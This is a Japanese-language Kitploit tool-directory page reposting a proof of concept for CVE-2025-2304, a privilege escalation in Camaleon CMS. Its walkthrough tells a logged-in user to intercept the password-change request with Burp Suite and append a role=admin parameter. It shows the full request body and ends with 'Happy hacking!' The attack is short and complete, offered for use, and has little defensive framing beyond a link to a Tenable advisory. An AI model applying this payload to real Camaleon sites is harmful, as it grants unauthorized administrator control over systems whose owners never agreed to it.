Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/azureadtrent/cve-2025-2304_poc
Privilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubazureadtrent/cve-2025-2304_poc

CVE-2025-2304_POC

CVE-2025-2304 POC - Camaleon CMS Privilege Escalation

リポジトリを見る
16ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-2304_POC

CVE-2025-2304 POC - Camaleon CMS 権限昇格

このPOCは、Camaleon CMSの権限を管理者に昇格させるために使用されます。このエクスプロイトは、認証されたユーザーのパスワードリセット機能にロールを注入することで動作します。


前提条件と仮定

  • ターゲットのCamaleon CMS上で、/adminにアクセスできるユーザーアカウントを持っていること。

1. インターセプト

まず、ユーザーアカウントにログインします。ログイン後、プロフィールページに移動し、「パスワード変更」をクリックします。Burp Suiteを使用してパスワード変更機能をキャプチャします。


2. ペイロードの変更

以下の例を参考に、ペイロードを編集してロールを追加します。

root@kitploit:~
_method=patch&authenticity_token=gHl57BgeyzdyiC3AzDPgwY2Wn82rjrWNXG_1cCnZbPgg4tkN8_u2nWtqBusMawZOrXpkh0hHXDYhpojYXvVTvQ&password%5Bpassword%5D=test1234&password%5Bpassword_confirmation%5D=test1234&password%5Brole%5D=admin

ペイロードに%5Brole%5D=adminを追加することで、管理者になることができます。


3. ページのリフレッシュ

ページをリフレッシュすると、管理者になっているはずです。

ハッピーハッキング!

リソース

https://www.tenable.com/security/research/tra-2025-09

ツールをダウンロード